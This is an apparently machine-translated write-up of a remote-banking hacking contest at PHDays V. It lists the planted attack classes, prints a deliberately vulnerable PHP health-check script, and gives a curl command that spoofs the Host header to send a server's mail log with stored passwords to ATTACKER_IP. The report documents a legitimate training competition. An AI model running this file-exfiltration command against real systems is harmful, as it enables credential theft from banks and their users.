How on PHDays V hacked the RB System

As part of the Positive Hack Days V Information Security Forum held in Moscow on May 26 and 27, a traditional competition was held on the analysis of the security of remote banking systems “ Big K $ h ”. The competition was held in two stages: first, participants were provided with copies of virtual machines containing vulnerable RBS web services similar to real systems. At the second stage, in one hour, participants had to take advantage of the security problems found in analyzing the image of the RBS system, and transfer money from the bank to their account.

This year, individual contests became part of the CTF (for more details, see our article on Habrahabr ), and along with the guests of the forum, CTF teams could participate in the competitions. The total number of participants in the competition was about 30 people, and the prize fund this year increased to 40 thousand rubles ( last year it was possible to “steal” 20 thousand).


')

Technical details

The RBD system PHDays iBank, containing vulnerabilities that are encountered in real banking systems, was developed specifically for the Big Koo $ h contest. This time the system was divided into two parts - the frontend and the backend, providing the simplest RESTful API. Therefore, the participants had to familiarize themselves with the protocol of interaction between the parts of the RBS.

As a rule, in the RB systems there are not “clumsy” security errors that allow conducting a direct attack with the introduction or execution of a malicious code, but logical vulnerabilities (weak checks leading to leakage of important data). It is on them that the emphasis is placed on the competitive RB system.

There were 7 combinations of vulnerabilities in PHDays iBank; for each combination, there were 10 virtual user bank accounts where the money was kept (the more complex the vulnerability, the more money in the account).

Participants could conduct the following attacks:

• brute-force lists of the most popular passwords available on the web;
• hacking accounts with connected two-factor authentication (bypass checks);
• exploitation of vulnerabilities in password reset algorithms;
• interaction with the test script used to monitor the health of the backend API (bypassing access checks, reading arbitrary files);
• circumvention of the deferred payments mechanism (this attack could also be used to steal money from the accounts of other contestants).

Several vulnerabilities embedded in the system

The test script contained the following code:

<?php if ($_SERVER['HTTP_HOST'] != 'ibank.dev') { exit; } if (empty($_GET['url'])) { exit; } $parts = parse_url($_GET['url']); $port = empty($parts['port']) ? '' : ':' . $parts['port']; $url = "http://{$parts['host']}$port/status"; $ch = curl_init(); curl_setopt_array($ch, [ // CURLOPT_URL => $_GET['url'], CURLOPT_URL => $url, CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true, ]); if (!empty($_GET['params'])) { curl_setopt_array($ch, [ CURLOPT_POST => true, CURLOPT_POSTFIELDS => $_GET['params'] ]); } var_dump(curl_exec($ch)); curl_close($ch); 

Host name verification can be bypassed. Knowing about the ability to transfer files and using the @ symbol in the parameter value, you can conduct the following attack:

curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/¶ms\[a\]=@ /var/www/frontend/data/logs/mail.log'

Having received the contents of the log file of sent messages, the participant could find account passwords in them that used the password recovery system.

To bypass two-factor authentication, a vulnerability was used, which was recently written on Habré . During the competition, it turned out that not all participants were familiar with it, and therefore worked in the old manner, sorting out possible values.

The course of the battle

Participants could not only attack the RBS system to withdraw funds from the bank, but also attack each other’s accounts, diverting money from them. It was on this path that the members of the More Smoked Leet Chicken team who won the competition went. As a result, the winners managed to earn more than 15 thousand rubles.

Stas Povolotsky, who became the second, was able to steal more than 3,200 rubles from a competitive bank.

An interesting point: the third-place RDot team managed to find and exploit the most vulnerabilities, but failed to protect the stolen money that was stolen from their account by the More Smoked Leet Chicken team.

Final standings:



Congratulations to the winners!